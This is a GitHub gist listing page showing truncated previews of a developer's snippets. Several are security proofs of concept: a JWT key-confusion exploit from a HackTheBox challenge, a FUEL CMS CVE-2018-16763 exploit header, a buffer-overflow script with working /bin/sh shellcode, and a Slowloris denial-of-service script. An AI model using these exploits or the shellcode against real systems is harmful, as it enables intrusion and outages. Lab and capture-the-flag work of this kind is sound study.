James Fraser wulfgarpro

wulfgarpro / jwt_forge.py
Last active Nov 2, 2020
HTB "Under Construction" CVE-2015-9235 PoC
View jwt_forge.py
"""
CVE-2015-9235 PoC, known as
"JWT HS/RSA key confusion vulnerability".
This PoC was used to solve the HTB challenge
"Under Construction" on HackTheBox (HTB).
USAGE:
==
Token was obtained by logging into the
wulfgarpro / fuelpwn.py
Created Sep 29, 2020
FUEL CMS v1.4.1 CVE-2018-16763 PoC
View fuelpwn.py
"""
FUEL CMS v1.4.1 CVE-2018-16763 PoC.
This PoC was derived from: https://www.exploit-db.com/exploits/47138.
"""
import argparse
import urllib
import requests
parser = argparse.ArgumentParser('Fuel CMS v1.4 CVE-2018-16763 PoC')
View exploit.py
BUF_SIZE=112
shellcode = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f"
shellcode += "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd"
shellcode += "\x80"
NOP_SLED = "\x90" * (BUF_SIZE - len(shellcode))
#0xffffd49c
#0xffffd4ac
#0xffffd440
#0xffffd43c
View keybase.md

Keybase proof

I hereby claim:

  • I am wulfgarpro on github.
  • I am wulfgarpro (https://keybase.io/wulfgarpro) on keybase.
  • I have a public key ASC8ENkegPmPXmvdtPn9D7MLtZLEmUW4JLAErh-1Zn0p2Ao

To claim this, I am signing this object:

wulfgarpro / slowloris.js
Last active May 23, 2017
Slowloris example against apache2 on Ubuntu 16.10 (yakkety) "2.4.18-2ubuntu4.1"
View slowloris.js
'use strict';
const net = require('net');
const maxConnections = 200; // Max connections
const host = '127.0.0.1';
const port = 80;
let connections= [];
function Connection(h, p) {
wulfgarpro / Makefile
Last active Jan 23, 2017
makefile header dependency target
View Makefile
SRCS = a.c
depend: .depend
.depend: $(SRCS)
	rm -f ./.depend
	$(CC) $(CFLAGS) -MM $^ -MF ./.depend;
include .depend
wulfgarpro / CMakeLists.txt
Last active Jul 14, 2016
Example cmake file with gtest
View CMakeLists.txt
cmake_minimum_required (VERSION 2.6)
option (test "Build all tests." ON)
project (Tutorial)
set (CMAKE_CXX_FLAGS "-g -Wall")
#add_subdirectory (src/tutorial)
# The version number.
wulfgarpro / generate.py
Last active Feb 21, 2016
cgi script in python to generate kml LineString with LineStyle
View generate.py
#!/usr/bin/python
import random
lat_a = random.randrange(35, 40)
lon_a = random.randrange(-120, -112)
lat_b = random.randrange(35, 40)
lon_b = random.randrange(-120, -112)
kml = (
wulfgarpro / cgi-kml.kml
Last active Feb 21, 2016
Example kml to load cgi script using NetworkLink with flyToView/refreshInterval enabled
View cgi-kml.kml
<?xml version="1.0" encoding="UTF-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2">
<Folder>
<name>Network Links</name>
<visibility>0</visibility>
<open>0</open>
<description>Network link example 1</description>
<NetworkLink>
<name>Random Placemark</name>
<visibility>0</visibility>
wulfgarpro / docker_rm_all.sh
Created Dec 1, 2015
Single line to remove all containers from docker
View docker_rm_all.sh
# -q prints only container IDs, so the "CONTAINER ID" header row is never passed to docker rm
docker ps -aq | xargs -I {} docker rm -f {}